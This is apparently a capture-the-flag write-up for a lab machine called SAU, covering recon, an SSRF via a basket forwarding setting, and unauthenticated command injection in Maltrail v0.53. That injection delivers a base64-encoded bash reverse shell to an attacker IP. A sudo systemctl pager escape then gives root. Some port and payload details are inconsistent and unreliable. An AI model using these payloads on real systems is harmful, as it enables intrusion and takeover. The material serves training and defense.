htb-writeups
SAU Machine Write-Up: From Recon to Root
Overview
This document details the complete penetration testing process for the SAU machine, covering reconnaissance, vulnerability assessment, exploitation, and post-exploitation leading to root access.
Reconnaissance
Initial Scanning
export target=10.129.17.179
# Comprehensive port scan
sudo nmap -p- --min-rate 5000 -sT -vvv $target
# Service enumeration on discovered ports
sudo nmap -sC -sV -p 22,55555 -T4 $target
Findings:
- Port 22: SSH service
- Port 55555: HTTP service running Maltrail v0.53
Web Application Analysis
Service Discovery
The web service on port 55555 hosts Maltrail, a malicious traffic detection system. Initial interaction revealed:
- Application Interface: Maltrail dashboard
- Key Feature: “Create Basket” functionality
- Proxy Settings: Forward URL configuration capability
Initial Testing
# Basic curl request
curl http://$target:55555/zntrtvt
# User-Agent manipulation attempt
curl http://$target:55555/zntrtvt -A "hello world"
# SSTI testing
curl http://$target:55555/zntrtvt -A "'\""
Web application interface after clicking “Create”:
After clicking “Open Basket” on the webpage:
Resulting URL: http://10.129.17.179:55555/zntrtvt
Initial curl request with no custom User-Agent:
curl http://10.129.17.179:55555/zntrtvt
Curl with custom User-Agent revealing headers:
curl http://10.129.17.179:55555/zntrtvt -A "hello world"
SSTI injection attempt:
curl http://10.129.17.179:55555/zntrtvt -A "'\""
Proxy Configuration Discovery
Settings menu revealing Forward URL functionality:
Testing with attacker’s IP as forward URL:
Traffic capture showing request forwarding:
sudo nc -nlvp 80
connect to [10.10.14.172] from (UNKNOWN) [10.129.17.179] 45098
GET / HTTP/1.1
Host: 10.10.14.172
User-Agent: curl/8.15.0
Accept: */*
X-Do-Not-Forward: 1
Accept-Encoding: gzip
Testing with localhost as forward URL:
Full webpage response revealing Maltrail v0.53:
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<meta name="viewport" content="width=device-width, user-scalable=no">
...............................................................................................................................................................................................................
<script type="text/javascript" src="js/thirdparty.min.js"></script>
<script type="text/javascript" src="js/papaparse.min.js"></script>
</head>
<body>
<div id="header_container" class="header noselect">
<div id="logo_container">
<span id="logo"><img src="images/mlogo.png" style="width: 25px">altrail</span>
</div>
............................................................................................................................................................................................................
<ul class="custom-menu">
<li data-action="hide_threat">Hide threat</li>
<li data-action="report_false_positive">Report false positive</li>
</ul>
<script defer type="text/javascript" src="js/main.js"></script>
</body>
</html>
Vulnerability Discovery
Maltrail v0.53 Unauthenticated RCE
Research revealed that Maltrail version 0.53 contains an unauthenticated remote code execution vulnerability.
Vulnerability Details:
- CVE: Not assigned
- Type: Remote Code Execution
- Attack Vector: HTTP request manipulation
- Complexity: Low
Exploitation
Method 1: Automated Exploitation
# Using public exploit
python3 exploit.py 10.10.14.172 9001 http://$target:55555
# Listener setup
nc -nlvp 9001
Method 2: Manual Exploitation
# Create reverse shell payload
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.172/9001 >&1"' | base64 -w0
# Execute payload through vulnerability
curl http://$target:55555/hello --data-urlencode 'username=;`echo "YmFzaCAtYyAiYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzkwMDEgID4mMSAgICIK" | base64 -d | sh`'
Shell Access Obtained:
cat /home/puma/user.txt
e635420e2f09e2907e721b7e1f131afa
Privilege Escalation
Enumeration
sudo -l
Findings:
User puma can execute the following command as root without password:
sudo /usr/bin/systemctl status trail.service
Exploiting Sudo Privileges
Using GTFOBins methodology for systemctl privilege escalation:
# Execute systemctl with sudo
sudo /usr/bin/systemctl status trail.service
# Escape to shell
!sh
Root Access Achieved:
cat /root/root.txt
e5d521ffcd4aa1187b3e86f7ea587a3a
Attack Chain Summary
- Port Discovery → Nmap scan revealed SSH and web services
- Service Identification → Maltrail v0.53 identified
- Vulnerability Research → Unauthenticated RCE discovered
- Initial Compromise → Reverse shell as
pumauser - Privilege Escalation → Abused sudo permissions on systemctl
- Root Access → Gained complete system control
Mitigation Recommendations
- Immediate Actions:
- Update Maltrail to latest version
- Restrict network access to administration interfaces
- Implement proper authentication mechanisms
- Long-term Security:
- Regular vulnerability assessments
- Principle of least privilege for service accounts
- Network segmentation
- Security patch management
Tools Used
- Nmap
- Curl
- Netcat
- Python3
- Base64
Key Takeaways
- Always verify software versions for known vulnerabilities
- Sudo privileges should be carefully audited
- Outdated security software can become attack vectors
- Defense in depth is crucial for comprehensive security
This write-up demonstrates a complete penetration testing methodology from initial reconnaissance to full system compromise. Always ensure you have proper authorization before testing systems.